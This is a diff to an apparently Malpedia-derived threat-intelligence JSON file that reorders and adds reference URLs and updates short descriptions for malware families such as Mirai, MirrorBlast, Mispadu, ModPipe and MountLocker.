"https://www.accenture.com/us-en/blogs/security/ransomware-hades", - "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", + "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021", + "http://www.secureworks.com/research/threat-profiles/gold-burlap", + "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html", + "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/", + "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/", + "https://www.welivesecurity.com/2022/09/06/worok-big-picture/", + "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/", + "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", + "https://github.com/gentilkiwi/mimikatz", + "https://asec.ahnlab.com/ko/39682/", + "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", + "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", + "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf", + "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns", + "https://www.crowdstrike.com/blog/overwatch-elite-call-escalation-vital-to-containing-attack/", + "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/", + "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware", + "https://www.ic3.gov/media/news/2020/200917-1.pdf", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", + "https://www.secureworks.com/blog/ransomware-deployed-by-adversary", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://asec.ahnlab.com/ko/56256/", + "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks", + "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", + "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger", + "https://twitter.com/swisscom_csirt/status/1354052879158571008", + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", + "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf", + "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/", + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", + "https://volatility-labs.blogspot.com/2021/10/memory-forensics-r-illustrated.html", + "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153", + "http://www.secureworks.com/research/threat-profiles/gold-franklin", + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", + "https://www.secureworks.com/research/samsam-ransomware-campaigns", "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/", - "https://www.welivesecurity.com/2022/09/06/worok-big-picture/" + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://noticeofpleadings.com/nickel/#", + "https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/", + "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf", + "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", + "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel", + "https://www.mandiant.com/resources/blog/alphv-ransomware-backup", + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://securelist.com/the-sessionmanager-iis-backdoor/106868/", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", + "https://attack.mitre.org/groups/G0034", + "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf", + "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/", + "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf", + "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf", + "https://www.ic3.gov/Media/News/2021/210823.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage", + "https://www.hvs-consulting.de/lazarus-report/", + "https://attack.mitre.org/groups/G0011", + "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "https://www.varonis.com/blog/hive-ransomware-analysis", + "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", + "https://www.secureworks.com/research/threat-profiles/bronze-vinewood", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection", + "https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/", + "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", + "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html", + "https://www.secureworks.com/research/threat-profiles/gold-drake", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east", + "https://www.ic3.gov/Media/News/2021/210527.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475.pdf", + "https://www.slideshare.net/yurikamuraki5/active-directory-240348605", + "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf", + "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass", + "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks", + "https://www.intrinsec.com/apt27-analysis/", + "https://attack.mitre.org/groups/G0096", + "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", + "https://www.secureworks.com/research/threat-profiles/cobalt-hickman", + "https://unit42.paloaltonetworks.com/trigona-ransomware-update/", + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://paraflare.com/attack-lifecycle-detection-of-an-operational-technology-breach/", + "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf", + "https://www.infinitumit.com.tr/apt-35/", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-152a", + "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia", + "https://www.accenture.com/us-en/blogs/security/ransomware-hades", + "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html" ], "synonyms": [], "type": [] @@ -33886,12 +35475,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge", + "https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat", "https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/", - "https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures", - "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html", - "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism", "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", - "https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat" + "https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures", + "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism", + "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html" ], "synonyms": [ "GazGolder" @@ -33919,15 +35508,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniduke", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/", - "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", - "https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf", "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://research.checkpoint.com/2022/native-function-and-assembly-code-invocation/", + "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/", "https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html", + "https://www.secureworks.com/research/threat-profiles/iron-hemlock", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://www.secureworks.com/research/threat-profiles/iron-hemlock" + "https://research.checkpoint.com/2022/native-function-and-assembly-code-invocation/", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/" ], "synonyms": [], "type": [] @@ -33966,10 +35555,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", - "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", - "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/", "https://www.secureworks.com/research/threat-profiles/bronze-palace", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" + "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf" ], "synonyms": [], "type": [] @@ -33995,16 +35584,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", + "https://twitter.com/PhysicalDrive0/status/830070569202749440", + "https://assets.virustotal.com/reports/2021trends.pdf", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot/", + "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/", + "https://dev.azure.com/Mastadamus/Mirai%20Botnet%20Analysis/_wiki/wikis/Mirai-Botnet-Analysis.wiki/12/Anatomy-of-An-Mirai-Botnet-Attack", "https://unit42.paloaltonetworks.com/moobot-d-link-devices/", "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", - "https://dev.azure.com/Mastadamus/Mirai%20Botnet%20Analysis/_wiki/wikis/Mirai-Botnet-Analysis.wiki/12/Anatomy-of-An-Mirai-Botnet-Attack", - "https://twitter.com/PhysicalDrive0/status/830070569202749440", - "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/", - "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html", - "https://assets.virustotal.com/reports/2021trends.pdf" + "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/" ], "synonyms": [], "type": [] @@ -34013,15 +35602,15 @@ "value": "Mirai (Windows)" }, { - "description": "", + "description": "According to Minerva Labs, MirrorBlast malware is a trojan that is known for attacking users\u2019 browsers. It usually pretends to be a legitimate browser add-on however it has now evolved additional capabilities, whereby other malwares are installed simultaneously. Recently, this trojan is thought to have tentative links to TA505 and PYSA groups.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast", - "https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant", "https://www.proofpoint.com/us/daily-ruleset-update-summary-20210924", "https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies", - "https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/", - "https://threatresearch.ext.hp.com/mirrorblast-and-ta505-examining-similarities-in-tactics-techniques-and-procedures/" + "https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant", + "https://threatresearch.ext.hp.com/mirrorblast-and-ta505-examining-similarities-in-tactics-techniques-and-procedures/", + "https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/" ], "synonyms": [], "type": [] @@ -34075,8 +35664,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.misha", - "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html", - "https://bazaar.abuse.ch/sample/efab8bfe43de6edf96f9451a5a2cc15017cfc5c88f81b46b33e6ba5c7e2d7a7b/" + "https://bazaar.abuse.ch/sample/efab8bfe43de6edf96f9451a5a2cc15017cfc5c88f81b46b33e6ba5c7e2d7a7b/", + "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html" ], "synonyms": [], "type": [] @@ -34085,15 +35674,15 @@ "value": "Misha" }, { - "description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald’s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.", + "description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald\u2019s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu", - "https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/", - "https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/", - "https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/", - "https://seguranca-informatica.pt/ursa-trojan-is-back-with-a-new-dance/#.YyXEkaRBzIU", "https://blog.scilabs.mx/cyber-threat-profile-malteiro/", + "https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/", + "https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/", + "https://seguranca-informatica.pt/ursa-trojan-is-back-with-a-new-dance/#.YyXEkaRBzIU", + "https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces" ], "synonyms": [ @@ -34109,10 +35698,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistcloak", - "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia", - "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/" + "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/", + "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia" + ], + "synonyms": [ + "HIUPAN" ], - "synonyms": [], "type": [] }, "uuid": "1e6bc052-73de-453d-ba6c-658c82fe21d4", @@ -34225,13 +35816,13 @@ "value": "MoDi RAT" }, { - "description": "ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS – a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture consisting of basic components and downloadable modules. One of them – named GetMicInfo – contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe's operators access to database contents, including various definitions and configuration, status tables and information about POS transactions. ", + "description": "ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS \u2013 a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture consisting of basic components and downloadable modules. One of them \u2013 named GetMicInfo \u2013 contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe's operators access to database contents, including various definitions and configuration, status tables and information about POS transactions. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe", - "https://www.foregenix.com/blog/modpipe-malware-has-a-new-module-that-siphons-payment-card-data", + "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/", "https://www.kroll.com/en/insights/publications/cyber/modpipe-pos-malware-new-hooking-targets-extract-card-data", - "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/" + "https://www.foregenix.com/blog/modpipe-malware-has-a-new-module-that-siphons-payment-card-data" ], "synonyms": [], "type": [] @@ -34244,8 +35835,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", - "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", - "https://twitter.com/physicaldrive0/status/670258429202530306" + "https://twitter.com/physicaldrive0/status/670258429202530306", + "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html" ], "synonyms": [ "straxbot" @@ -34287,9 +35878,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network", - "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", "https://breakingmalware.com/malware/moker-part-2-capabilities/", - "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/" + "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/", + "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/" ], "synonyms": [], "type": [] @@ -34302,8 +35893,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", - "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/", - "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" + "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/", + "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/" ], "synonyms": [], "type": [] @@ -34343,11 +35934,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", - "https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/", + "http://www.clearskysec.com/iec/", "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", - "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", + "https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/", "https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east", - "http://www.clearskysec.com/iec/" + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" ], "synonyms": [], "type": [] @@ -34360,11 +35951,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", - "https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor", "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/", + "https://asec.ahnlab.com/en/37526/", "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/", - "https://asec.ahnlab.com/en/37526/" + "https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/" ], "synonyms": [ "CoinMiner" @@ -34379,7 +35970,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moneymessage", - "https://yoroi.company/research/money-ransomware-the-latest-double-extortion-group/" + "https://yoroi.company/research/money-ransomware-the-latest-double-extortion-group/", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://resources.securityscorecard.com/research/analysis-money-message-ransomware" ], "synonyms": [], "type": [] @@ -34420,10 +36013,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce", - "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/19115831/MoonBounce_technical-details_eng.pdf", "https://www.binarly.io/posts/A_deeper_UEFI_dive_into_MoonBounce/index.html", - "https://habr.com/ru/amp/post/668154/" + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/19115831/MoonBounce_technical-details_eng.pdf", + "https://habr.com/ru/amp/post/668154/", + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/" ], "synonyms": [], "type": [] @@ -34450,11 +36043,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent", "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a", - "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf", - "https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590#", - "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://twitter.com/Timele9527/status/1272776776335233024", + "https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590#", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611", "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/" ], "synonyms": [], @@ -34506,9 +36099,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A", + "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", "https://www.f-secure.com/weblog/archives/00002227.html", - "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html" + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" ], "synonyms": [], "type": [] @@ -34547,14 +36140,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", - "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", - "https://www.recordedfuture.com/turla-apt-infrastructure/", - "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", - "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", - "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", + "https://www.recordedfuture.com/turla-apt-infrastructure/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://www.secureworks.com/research/threat-profiles/iron-hunter" ], "synonyms": [], "type": [] @@ -34563,38 +36156,39 @@ "value": "Mosquito" }, { - "description": "According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020\r\nThe MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software.\r\nVictim’s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048.\r\nThe ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.", + "description": "According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020\r\nThe MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software.\r\nVictim\u2019s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048.\r\nThe ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry", - 